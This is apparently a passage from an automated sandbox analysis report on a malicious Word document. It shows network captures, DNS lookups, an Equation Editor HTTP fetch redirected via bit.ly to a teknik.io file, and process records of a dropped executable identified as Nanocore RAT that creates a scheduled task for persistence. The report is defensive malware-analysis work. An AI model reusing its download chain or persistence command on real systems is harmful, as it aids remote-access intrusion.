Feb 24, 2021 12:53:28.154350996 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.154366970 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.154388905 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.154659986 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.154720068 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.154763937 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.154819012 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.154875994 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.154923916 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.154930115 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.154944897 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.154978037 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.154992104 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.155086994 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.155148029 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.155163050 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.155188084 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.155217886 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.155226946 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.155242920 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.155251026 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.155272007 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.155275106 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.155299902 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.155303955 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.155327082 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.155327082 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.155348063 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.155353069 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.155380011 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.155400038 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.155401945 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.155426025 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.155452013 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.155452967 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.155478954 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.155508041 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.155548096 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.155570030 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.155592918 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.155608892 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.155641079 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.155699015 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.155721903 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.155754089 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.155776024 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.155862093 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.155881882 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.155904055 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.155915022 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.155944109 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.155997038 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.156016111 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.156056881 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.156081915 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.156133890 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.156200886 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.156251907 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.157296896 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.158225060 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.158312082 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.158375025 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.158437967 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.158454895 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.158477068 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.158508062 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.158521891 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.158540964 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.158556938 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.158571959 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.158593893 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.158596992 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.158623934 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.158631086 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.158648014 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.158662081 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.158693075 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.158703089 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.158739090 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.158822060 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.158898115 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.159010887 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.159033060 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.159086943 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.159104109 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.159126043 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.159174919 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.159177065 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.159216881 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.159218073 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.159270048 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.159279108 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.159346104 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.159624100 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.159687042 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.159696102 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.159734011 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.159971952 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.159996033 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.160054922 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.160080910 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.160114050 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.160135031 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.160145044 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.160161018 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.160195112 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.160228014 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.160259008 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.160312891 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.160336018 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.160346985 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.160363913 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.160371065 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.160423994 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.160437107 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.160459995 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.160481930 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.160511971 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.160548925 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.160554886 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.160588026 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.160610914 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.160629988 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.160634995 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.160680056 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.160686970 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.160706997 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.160754919 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.160768032 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.160829067 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.160832882 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.160856009 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.160873890 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.160903931 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.160939932 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.161266088 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.161289930 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.161309958 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.161330938 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.161341906 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.161362886 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.161377907 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.161431074 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.161462069 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.161465883 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.161494017 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.161501884 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.161520004 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.161544085 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.161549091 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.161576033 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.161592007 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.161600113 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.161623001 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.161633968 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.161675930 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.161712885 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.161780119 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.161792040 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.161832094 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.161932945 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.161956072 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.161977053 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.161997080 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.162014961 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.162036896 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.162045956 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.162060022 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.162081003 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.162089109 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.162105083 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.162132978 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.162146091 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.162168026 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.162170887 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.162205935 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.162252903 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.162328005 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.162360907 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.162383080 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.162399054 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.162405014 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.162439108 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.162453890 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.162473917 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.162473917 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.162498951 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.162513971 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.162533998 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.162556887 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.162558079 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.162580013 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.162591934 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.162638903 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.162662983 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.162684917 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.162708998 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.162727118 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.162733078 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.162774086 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.162805080 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.162818909 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.162867069 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.162877083 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.162890911 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.162916899 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.162950039 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.162972927 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.163001060 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.163032055 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.163057089 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.163068056 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.163085938 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.163113117 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.163119078 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.163146019 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.163162947 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.163173914 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.163186073 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.163223028 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.163312912 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.163357973 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.163369894 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.163407087 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.163471937 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.163495064 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.163510084 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.163521051 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.163556099 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.163589001 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.163608074 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.163625956 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.163636923 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.163649082 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.163671970 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.163698912 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.163749933 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.163765907 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.163803101 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.163810015 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.163871050 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.163873911 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.163925886 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.178117990 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.653207064 CET	49165	80	192.168.2.22	67.199.248.11
Feb 24, 2021 12:53:28.653259039 CET	49166	443	192.168.2.22	5.79.72.163

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 24, 2021 12:53:25.749974966 CET	52197	53	192.168.2.22	8.8.8.8
Feb 24, 2021 12:53:25.763849020 CET	53	52197	8.8.8.8	192.168.2.22
Feb 24, 2021 12:53:25.968547106 CET	53099	53	192.168.2.22	8.8.8.8
Feb 24, 2021 12:53:26.105269909 CET	53	53099	8.8.8.8	192.168.2.22
Feb 24, 2021 12:53:26.551832914 CET	52838	53	192.168.2.22	8.8.8.8
Feb 24, 2021 12:53:26.564204931 CET	53	52838	8.8.8.8	192.168.2.22
Feb 24, 2021 12:53:26.564425945 CET	52838	53	192.168.2.22	8.8.8.8
Feb 24, 2021 12:53:26.578783035 CET	53	52838	8.8.8.8	192.168.2.22
Feb 24, 2021 12:53:26.591342926 CET	61200	53	192.168.2.22	8.8.8.8
Feb 24, 2021 12:53:26.605803013 CET	53	61200	8.8.8.8	192.168.2.22
Feb 24, 2021 12:53:27.098644972 CET	49548	53	192.168.2.22	8.8.8.8
Feb 24, 2021 12:53:27.116538048 CET	53	49548	8.8.8.8	192.168.2.22
Feb 24, 2021 12:53:27.120400906 CET	55627	53	192.168.2.22	8.8.8.8
Feb 24, 2021 12:53:27.132972002 CET	53	55627	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 24, 2021 12:53:25.749974966 CET	192.168.2.22	8.8.8.8	0xc229	Standard query (0)	bit.ly	A (IP address)	IN (0x0001)
Feb 24, 2021 12:53:25.968547106 CET	192.168.2.22	8.8.8.8	0xbdfc	Standard query (0)	u.teknik.io	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 24, 2021 12:53:25.763849020 CET	8.8.8.8	192.168.2.22	0xc229	No error (0)	bit.ly		67.199.248.11	A (IP address)	IN (0x0001)
Feb 24, 2021 12:53:25.763849020 CET	8.8.8.8	192.168.2.22	0xc229	No error (0)	bit.ly		67.199.248.10	A (IP address)	IN (0x0001)
Feb 24, 2021 12:53:26.105269909 CET	8.8.8.8	192.168.2.22	0xbdfc	No error (0)	u.teknik.io	teknik.io		CNAME (Canonical name)	IN (0x0001)
Feb 24, 2021 12:53:26.105269909 CET	8.8.8.8	192.168.2.22	0xbdfc	No error (0)	teknik.io		5.79.72.163	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

bit.ly

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	67.199.248.11	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 24, 2021 12:53:25.791449070 CET	0	OUT	GET /3kijui1 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: bit.ly Connection: Keep-Alive
Feb 24, 2021 12:53:25.911385059 CET	1	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 24 Feb 2021 11:53:25 GMT Content-Type: text/html; charset=utf-8 Content-Length: 116 Cache-Control: private, max-age=90 Location: https://u.teknik.io/HOMqO.txt Set-Cookie: _bit=l1obRp-93e7878892ed3a82aa-00m; Domain=bit.ly; Expires=Mon, 23 Aug 2021 11:53:25 GMT Via: 1.1 google Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 2e 74 65 6b 6e 69 6b 2e 69 6f 2f 48 4f 4d 71 4f 2e 74 78 74 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Bitly</title></head><body><a href="https://u.teknik.io/HOMqO.txt">moved here</a></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2264 Parent PID: 584

General

Start time:	12:53:31
Start date:	24/02/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f830000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 1324 Parent PID: 584

General

Start time:	12:53:35
Start date:	24/02/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: 69577.exe PID: 2320 Parent PID: 1324

General

Start time:	12:53:38
Start date:	24/02/2021
Path:	C:\Users\Public\69577.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\69577.exe
Imagebase:	0x3e0000
File size:	766976 bytes
MD5 hash:	8C596990203F7D15651498FDBA84B5F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 824 Parent PID: 2320

General

Start time:	12:53:51
Start date:	24/02/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\xWdTBYiTWyTud' /XML 'C:\Users\user\AppData\Local\Temp\tmpA738.tmp'
Imagebase:	0xa20000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: 69577.exe PID: 2900 Parent PID: 2320

General

Start time:	12:53:52
Start date:	24/02/2021
Path:	C:\Users\Public\69577.exe
Wow64 process (32bit):	false
Commandline:	{path}
Imagebase:	0x3e0000
File size:	766976 bytes
MD5 hash:	8C596990203F7D15651498FDBA84B5F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: 69577.exe PID: 2500 Parent PID: 2320

General

Start time:	12:53:52
Start date:	24/02/2021
Path:	C:\Users\Public\69577.exe
Wow64 process (32bit):	false
Commandline:	{path}
Imagebase:	0x3e0000
File size:	766976 bytes
MD5 hash:	8C596990203F7D15651498FDBA84B5F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: 69577.exe PID: 2480 Parent PID: 2320

General

Start time:	12:53:53
Start date:	24/02/2021
Path:	C:\Users\Public\69577.exe
Wow64 process (32bit):	false
Commandline:	{path}
Imagebase:	0x3e0000
File size:	766976 bytes
MD5 hash:	8C596990203F7D15651498FDBA84B5F3
Has elevated privileges:	true
Has administrator privileges:	true
